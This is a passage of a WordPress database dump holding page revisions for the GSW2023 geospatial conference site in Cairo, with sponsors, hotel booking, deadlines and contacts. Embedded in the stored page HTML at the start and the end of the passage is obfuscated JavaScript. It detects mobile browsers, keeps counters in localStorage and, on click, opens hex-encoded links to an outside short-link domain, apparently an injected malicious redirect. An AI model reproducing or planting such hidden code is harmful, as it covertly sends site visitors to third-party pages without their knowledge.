|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:05:51','2023-05-17 05:05:51','',3066,'https://gsw2023.com/?p=4521',0,'revision','',0),
(4522,1,'2023-05-17 05:07:00','2023-05-17 05:07:00','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n[vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOUR HOTEL NOW\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue </a></strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\"><strong>(InterContinental Cairo Semiramis)</strong></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Special Rate Booking is Opened Now</a></strong></span></h4>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"]\r\n<h3>[vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner]</h3>\r\n<h3>[vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf